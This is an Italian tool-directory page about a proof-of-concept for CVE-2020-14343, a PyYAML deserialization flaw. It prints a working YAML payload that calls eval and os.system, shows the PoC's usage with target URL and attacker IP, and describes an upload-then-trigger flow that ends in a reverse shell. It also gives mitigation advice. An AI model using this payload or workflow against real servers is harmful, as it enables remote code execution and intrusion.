Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-14343-PyYAML — CVE-2020-14343的payload | Kitploit
Strumenti/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

CVE-2020-14343的payload

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-14343 PyYAML POC per vulnerabilità di deserializzazione

Panoramica della vulnerabilità

VoceInformazione
ID CVECVE-2020-14343
Componente interessatoPyYAML < 5.4
Tipo di vulnerabilitàDeserializzazione RCE (Remote Code Execution)
Livello di pericolositàAlto

Principio della vulnerabilità

Quando PyYAML utilizza yaml.load() per analizzare dati non fidati, non limita i tag YAML pericolosi (come !!python/object). Un attaccante può creare contenuti YAML malevoli per eseguire codice Python arbitrario.

Payload principale:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Utilizzo

root@kitploit:~
python poc.py <目标URL> <攻击者IP> <监听端口>

Esempio:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

Flusso dell'attacco

  1. Lo script avvia un listener TCP in locale.
  2. Carica un file YAML malevolo sull'endpoint /upload del target.
  3. Attiva l'endpoint /login per caricare e analizzare il YAML.
  4. Il server target esegue il payload e invia una reverse shell all'attaccante.

Installazione delle dipendenze

root@kitploit:~
pip install requests

Dichiarazione di esclusione di responsabilità

⚠️ Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati!

  • Non utilizzarlo per scopi illegali.
  • Prima dell'uso, assicurati di avere l'autorizzazione del sistema target.
  • L'autore non è responsabile per qualsiasi uso improprio.

Raccomandazioni per la mitigazione

  1. Utilizzare yaml.safe_load() al posto di yaml.load().
  2. Aggiornare PyYAML alla versione 5.4 o successiva.
  3. Effettuare una validazione rigorosa degli input utente.

Collegamenti di riferimento

  • CVE-2020-14343 - NVD
  • Documentazione ufficiale PyYAML
Scarica lo strumento